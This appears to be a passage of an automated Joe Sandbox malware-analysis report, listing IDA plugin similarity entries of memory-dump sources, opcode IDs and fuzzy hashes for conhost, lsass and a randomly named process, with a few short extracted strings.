                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction ID: 386651720350b0619f7d7d9a3cfaa5a0b8af7bb539c6fe2dbe72a98b27a909b0
                                                            • Opcode Fuzzy Hash: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction Fuzzy Hash: 7BC04C345518099FC948EB29C89595477A0FB1A315BD50094E409C7171D65AECD5D781
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c5a7bb0cad772a8a1714670478efcfc73a73c16a08499eddb5c965bec1d36a2
                                                            • Instruction ID: 318d0560390dcb834ecf2f51f545181193a582853a53cdf06b89bec213e2bf8f
                                                            • Opcode Fuzzy Hash: 1c5a7bb0cad772a8a1714670478efcfc73a73c16a08499eddb5c965bec1d36a2
                                                            • Instruction Fuzzy Hash: 0FD09510B0F50385F2F84A1280F033EA1A1AF0A78AE60013FC29FC19C5CA2CB902B203
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0a0b178df8a853ecf44213e8b4c7d261b00bccbbc3d75b2413b882f2b67df8e
                                                            • Instruction ID: 6ef7c16c5ac49b1e03ad662085d51d9854c53450f4edfbe36d25fb5cea7a7033
                                                            • Opcode Fuzzy Hash: c0a0b178df8a853ecf44213e8b4c7d261b00bccbbc3d75b2413b882f2b67df8e
                                                            • Instruction Fuzzy Hash: F7C08C00F08C5646F2A4628400312BE04064F88304F644430E10EEB3C7CD6C2D0202C6
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction ID: a84eed44f54335c228166c2b680a71cf7003e3d9a047fb829d510b8d8adaef60
                                                            • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction Fuzzy Hash: 23B01200E5A40F08A404337E08D20A470405B47100FC000B0D60EC00819CCD249422C2
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction ID: 46483bb4b5e4ee59b5de81c9b5a2aa8061e20f852aa1730399efe1ce38cac06f
                                                            • Opcode Fuzzy Hash: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction Fuzzy Hash: 90C02B30F0C40C44E734433048520FB32014F47304F0542F1810BFB082CC3C1C003180
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77e8028ad7257f300313975090e251458c7ce4702a3d98d21782e4a3c9e41d50
                                                            • Instruction ID: 1104f6219214bad53ee0bc150a45b7572693a3c81e87ad9833675077e0b6c295
                                                            • Opcode Fuzzy Hash: 77e8028ad7257f300313975090e251458c7ce4702a3d98d21782e4a3c9e41d50
                                                            • Instruction Fuzzy Hash: 92B00205F0E60757B5651CA544FA17D05514B4A7C9E940936975AC61C6DC5C28447161
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 19f9022f087a140241641a209f260c8d6e5ad60b3058d73327d322ddeecc527c
                                                            • Instruction ID: 40787fd4f5c1e84265361780250e3d326b567a453aa7cccb4a766ba0eb3ec8f2
                                                            • Opcode Fuzzy Hash: 19f9022f087a140241641a209f260c8d6e5ad60b3058d73327d322ddeecc527c
                                                            • Instruction Fuzzy Hash: 5B418207B0D56A6AE22137FD75711FE6BA88F82375B0C6777E14C9A1C36CB8708182E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5\_H
                                                            • API String ID: 0-3325266018
                                                            • Opcode ID: dd2f8c0b45bdd7132e241855dc3b8244ea70cbdd230bc23db8ed1a625a9d7f0a
                                                            • Instruction ID: ee64c9184921239c9320976e17d5ad98673bc4793daa2ffb351cff58b891a220
                                                            • Opcode Fuzzy Hash: dd2f8c0b45bdd7132e241855dc3b8244ea70cbdd230bc23db8ed1a625a9d7f0a
                                                            • Instruction Fuzzy Hash: 2791F275A0CA898FE799DB6C88B57A97FE1FF56310F0501BBD049D72D2DA792410C740
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HAw4
                                                            • API String ID: 0-1333154749
                                                            • Opcode ID: 9f508d8c67b159954c274a96bada799bf8eb18e5e6de62201f37b6f36ce2534b
                                                            • Instruction ID: 1de46d644310e21dfcdaab58d4442a1fc80496427a0d24b4bd410c26803ed85e
                                                            • Opcode Fuzzy Hash: 9f508d8c67b159954c274a96bada799bf8eb18e5e6de62201f37b6f36ce2534b
                                                            • Instruction Fuzzy Hash: 6B312421A0E6890FE7969B7888751E97FB1EF87310F0A41F7D549C70E3E92C69068791
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 72db52f290d04874447b1f39fa62e6fbe473464044a0ad89d30d73fa4471c644
                                                            • Instruction ID: 0ca73c73edd1712b34dde287604083391bcaaa3bb43feaafdda0e0897e45f42f
                                                            • Opcode Fuzzy Hash: 72db52f290d04874447b1f39fa62e6fbe473464044a0ad89d30d73fa4471c644
                                                            • Instruction Fuzzy Hash: 08411322B0C5251FE754B7FC60E96FE7795DF86321B0805BBD14DC71D3ED28A8818284
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8f5b4c66163c9a4051d57840cf6aea2f2112f01a89cea90088c6717ffb9e12d4
                                                            • Instruction ID: 70152f83c9713cb9fe973c396017b9eb7d9bba43671483cb218796b982f7bd6d
                                                            • Opcode Fuzzy Hash: 8f5b4c66163c9a4051d57840cf6aea2f2112f01a89cea90088c6717ffb9e12d4
                                                            • Instruction Fuzzy Hash: C841F422B0CA691FE754B7FC60EA6F977D5DF85321B0844BBD14DC71D3ED28A8818284
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction ID: 70285359ceed2f5cfd70f912deedf529b2c77f24fcc3d0751132b7e3a1c2fe30
                                                            • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction Fuzzy Hash: B621EA3130CC184FE7A8EB1CE889DB977D1EF9A32171501BAE58EC7125E915EC8287C2
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 46503b981595aaa92a835d2bb8867a0cba22da3ecefed2c88197b9e0e50aef8a
                                                            • Instruction ID: 3ea17965b18d35a43510dd58715c2a1550a814eb4a6df65fb257ebef8c1a939b
                                                            • Opcode Fuzzy Hash: 46503b981595aaa92a835d2bb8867a0cba22da3ecefed2c88197b9e0e50aef8a
                                                            • Instruction Fuzzy Hash: AC312E61B08A1A8FFBD4EB2884A57BC6291FF5B700F5101B5D60ED7292EE2CAC40A701
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b7ef9e9f6768238f7ea5b1b011fbecf650828ba1776b137d57375e5955e32d71
                                                            • Instruction ID: a6df84fb89539bd106edce058beec5e281d4f5c0ec066f964ab006a306a51b0f
                                                            • Opcode Fuzzy Hash: b7ef9e9f6768238f7ea5b1b011fbecf650828ba1776b137d57375e5955e32d71
                                                            • Instruction Fuzzy Hash: 9831C231A0C64A8FDB85EB68C8A4AB97BF0FF5A300F0545BAC009D7193DE29A841CB40
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 856a706a8d41a28798b4bc1f65360d5f2ff9a2973e79b3dd68ae9886b7c032d3
                                                            • Instruction ID: 8c892e4b6463176cbd32300aba62e25a9456017d09958f468c3d290b413a6d4d
                                                            • Opcode Fuzzy Hash: 856a706a8d41a28798b4bc1f65360d5f2ff9a2973e79b3dd68ae9886b7c032d3
                                                            • Instruction Fuzzy Hash: CD21F920F189290FE7D8A76C94EA6B976C2EF9A311F1404BEE50DC33E3DD2CAC414680
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ccb7f1236071498c6c3dbf7838631356e928c3427a217ba8039be87cad0a387f
                                                            • Instruction ID: 2b2ad6a92988a750c17788c4ad80bf35f19ff7e80308d65c27a75c53f482908a
                                                            • Opcode Fuzzy Hash: ccb7f1236071498c6c3dbf7838631356e928c3427a217ba8039be87cad0a387f
                                                            • Instruction Fuzzy Hash: 7621F636B0D3499FE722ABA898A10ED7B64EF53320F0941B3D148DB083D93C65469281
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 086c387e16eac254c0ff958986515dec3e2a822fca919b574909c25606533031
                                                            • Instruction ID: e751564e55bef74b10a85b411fffc1681fa7855d7c8ddb744b9c543b236f5877
                                                            • Opcode Fuzzy Hash: 086c387e16eac254c0ff958986515dec3e2a822fca919b574909c25606533031
                                                            • Instruction Fuzzy Hash: F211A036B0D3899FE752DF6888A10ED7BB1EF63310F1641B6D144DB182D93C6A069780
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b99592face9f2cdfd70a1be8703941ee31b238e5f3eb900805d432c32c0978c
                                                            • Instruction ID: 4c33cdc28c7ffe5127b65fa029573eaa1dd65b5ff7e29f99e49a78a7141035a7
                                                            • Opcode Fuzzy Hash: 6b99592face9f2cdfd70a1be8703941ee31b238e5f3eb900805d432c32c0978c
                                                            • Instruction Fuzzy Hash: C0110D31A08A09CFDF94EB44C494BAD77F2EB58314F15416AC00ED7290CB79A981DF44
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1cd51ebbc09b2d613443ec980bc1f8bf1f82066cc4278dba8b329ce02149857d
                                                            • Instruction ID: 68fbb5cf44d58e27acb8ab6fdb710b9002774e3ea7e8ebb43374eeb3ff830aac
                                                            • Opcode Fuzzy Hash: 1cd51ebbc09b2d613443ec980bc1f8bf1f82066cc4278dba8b329ce02149857d
                                                            • Instruction Fuzzy Hash: 6F11AD36F0E3899FE752DF6888A10DD7BB1EF63310F1641B6D144DB192DA3C6A469780
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 220b1bd2ff826bf319197f4d4ce75a1355b63edd3784d07e0b8da15d275b1d82
                                                            • Instruction ID: 88817f74e73ca8eff9947524353eae456bcd51254a658c1b1d16517b05e232c6
                                                            • Opcode Fuzzy Hash: 220b1bd2ff826bf319197f4d4ce75a1355b63edd3784d07e0b8da15d275b1d82
                                                            • Instruction Fuzzy Hash: E6018F35E0E3899FEB92DF6888A009D7FB1EF53310F1941F6D544DB182DA3C6A459741
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction ID: 5e6ed63707f2bc9010a52eb4e2c9ffbff020a37b71ab709fd5c91ace5f0ca8de
                                                            • Opcode Fuzzy Hash: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction Fuzzy Hash: 92F0EC31A5861E8EFB95EB40C8E47FC73A1FF96701F5101B5C60AD72A1EF2C69809A40
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction ID: 8343f5062eed9c74904eb9f81b43a2e41c1ca57b2e55f66b9b41351d5dce8de2
                                                            • Opcode Fuzzy Hash: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction Fuzzy Hash: 03F05E31B0860A4EFBD0EB00C8E46FC2391FF57700F110175CA4ED72A2EE2C69409640
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9f741c335bb81b8b3a2a43d825f713628b01fad9ca8297cef718fb09dcc1cf7
                                                            • Instruction ID: d58d711ea841102f258a18b2b8651d245ffca8f77631bb9eff4bbb6ec4cac126
                                                            • Opcode Fuzzy Hash: b9f741c335bb81b8b3a2a43d825f713628b01fad9ca8297cef718fb09dcc1cf7
                                                            • Instruction Fuzzy Hash: 32E02001D4E34606E642337D14F209D7A141F93214F9A0073D65CD7093B88E30982652
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction ID: c1d02840d9a666f4995035e8093ea6d6ce33b2184c62f3e1b7bfaf042cd1ae2f
                                                            • Opcode Fuzzy Hash: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction Fuzzy Hash: C5E01A60F0910686FBD4A744D8A0BA963A5EF8A310F151078EB8EE33C1CD2CAD409B06
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 328f2719d672d29b5b68c311e6b4c6e7d26fcaa1a2469217ebe8a8a5fa804afd
                                                            • Instruction ID: 36f2b58407e9d2a6cc7dc351823ca5c3e6900f0993e5c88492aa9b423cd7ef42
                                                            • Opcode Fuzzy Hash: 328f2719d672d29b5b68c311e6b4c6e7d26fcaa1a2469217ebe8a8a5fa804afd
                                                            • Instruction Fuzzy Hash: 9DD02E306209084BCB08EF38C88E034B3D1FB89202F89C1BA904EC2660CFA998814301
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction ID: 49bef44c0f700b659f394c1f9259385413ad8498f9c99b1b2cb0522be9a06a65
                                                            • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction Fuzzy Hash: 74D0A930228A4E8FDA40B738C98A8247BA0FF0F211FC910E1E008C71A2D60888A98701
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction ID: 8ddbb976a66202f55149dd32f9ea4020d02bb0e0f5a02c47a6fa3b509c30d369
                                                            • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction Fuzzy Hash: 0FC04C05F5A71F01F895B76E58E60ACA1405FD7610FE70172D75DD00D19C4D20D52156
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction ID: d1ef27e4795d0e75ae104c569a6eb725a0fad397ce6631010fd1dc71705e173c
                                                            • Opcode Fuzzy Hash: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction Fuzzy Hash: 66C04C345518098FC948EB29C89595477A0FB1A315BD50094E409C71B1D65EDCD5D781
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 315a8956e3c4772883f884b838e789815bf3e115211e79c393b38d07ce65fa63
                                                            • Instruction ID: c7a925d025d3ffdead47d6814ce12209f9fef6ebd2a946efb145c35c31248fe3
                                                            • Opcode Fuzzy Hash: 315a8956e3c4772883f884b838e789815bf3e115211e79c393b38d07ce65fa63
                                                            • Instruction Fuzzy Hash: 4DC08C00F08C1642F2E4628400702BD04465F84300F444030E10DE73C6CD2C2D0102C6
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction ID: fba0a12d1462d69a08b1b952731c0dd55b688864278d5d6a8c0d81164f21f6f9
                                                            • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction Fuzzy Hash: 47B01200E5640F00E484337E0CD206470405F87100FC200B0E61DC0091984D20942242
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction ID: 657dfeefb8f3552e451ccc42076080edbdcd709b8c07c09cc7e21a78981d4bb4
                                                            • Opcode Fuzzy Hash: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction Fuzzy Hash: 5EC02230F0800C80EBA8833088A20FA33028F83308F0A82F2C20AFB083CC3C28003200
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 569b4fc36500e7af5e94188623208a2a00e6a6757efb939b96c80f24fb28beb8
                                                            • Instruction ID: 1a80ca7b8298d169d405ac6e23cf83d0d4ff3ab342ca5e245abd64dc08468510
                                                            • Opcode Fuzzy Hash: 569b4fc36500e7af5e94188623208a2a00e6a6757efb939b96c80f24fb28beb8
                                                            • Instruction Fuzzy Hash: 48416D17B0C1626AE12137FD75715EE6BAC8F86334B0C5677E14CEA0939CB874C582E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Y_H
                                                            • API String ID: 0-3237497481
                                                            • Opcode ID: 6e2d8d66a362c7f5179eb0003b8adab3284350e7c99196b08646560828980e0e
                                                            • Instruction ID: 931844fb01f486ab59903956cd7e89c6c2c41927f5213201ad6e0da5748ef390
                                                            • Opcode Fuzzy Hash: 6e2d8d66a362c7f5179eb0003b8adab3284350e7c99196b08646560828980e0e
                                                            • Instruction Fuzzy Hash: 7491D6B5A0DA8D8FE755EB9C88B97A97FE1EF56300F0401BAC04AD76D2DE792411C740
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HAz4
                                                            • API String ID: 0-4208471536
                                                            • Opcode ID: 1be6086aa528d5f90d2a626cf513d291d6270380fef2cbf67252e14cb1caee28
                                                            • Instruction ID: 7470b4312726b0e37fc381a5c3c137eee02d1f7244ea50c529dd3a121b239b27
